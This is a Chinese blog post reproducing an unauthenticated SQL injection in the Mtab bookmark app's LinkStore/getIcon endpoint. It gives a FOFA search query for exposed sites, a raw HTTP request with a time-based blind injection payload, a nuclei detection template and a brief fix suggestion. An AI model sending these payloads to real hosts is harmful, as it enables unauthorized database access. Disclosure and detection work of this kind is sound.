Mtab书签导航程序-LinkStore/getIcon-SQL注入

0x01 产品简介

Mtab书签导航程序-免费无广告的浏览器书签助手,多端同步、美观易用的在线导航和书签工具,自主研发免费使用,帮助您高效管理网页和应用,提升在线体验。

0x02 漏洞描述

Mtab书签导航程序LinkStore/getlcon接口存在SQL注入漏洞,未经身分验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马进一步获取服务器系统权限。

0x03 影响版本

0x04 搜索语法

FOFA

1
title="Mtab书签"

0x05 漏洞复现

image-20240812095036642

漏洞poc

1
2
3
4
5
6
7
POST /LinkStore/getIcon HTTP/2
Host: ip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Length: 50

{"url":"'XOR(if(now()=sysdate(),sleep(5),0))XOR'"}

nuclei的poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
id: Mtab-getlcon-sqli

info:
name: Mtab书签导航程序getlcon SQL注入
author: admin
severity: high
tags: sqli,Mtab,mtab,书签导航程序



http:
- raw:
- |
POST /LinkStore/getIcon HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Length: 50

{"url":"'XOR(if(now()=sysdate(),sleep(5),0))XOR'"}

- |
POST /LinkStore/getIcon HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Length: 50

{"url":"'XOR(if(now()=sysdate(),sleep(10),0))XOR'"}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "未查询到相关信息"
- type: dsl
dsl:
- 'duration_1>=5 && duration_1<=7'
- 'duration_2>=10 && duration_2<=11'

image-20240812103603461

0x06 修复建议

关闭接口,或者做授权


Mtab书签导航程序-LinkStore/getIcon-SQL注入
https://tsy244.github.io/2024/08/12/漏洞复现/Mtab书签导航程序-LinkStore-getIcon-SQL注入/
Author
August Rosenberg
Posted on
August 12, 2024
Licensed under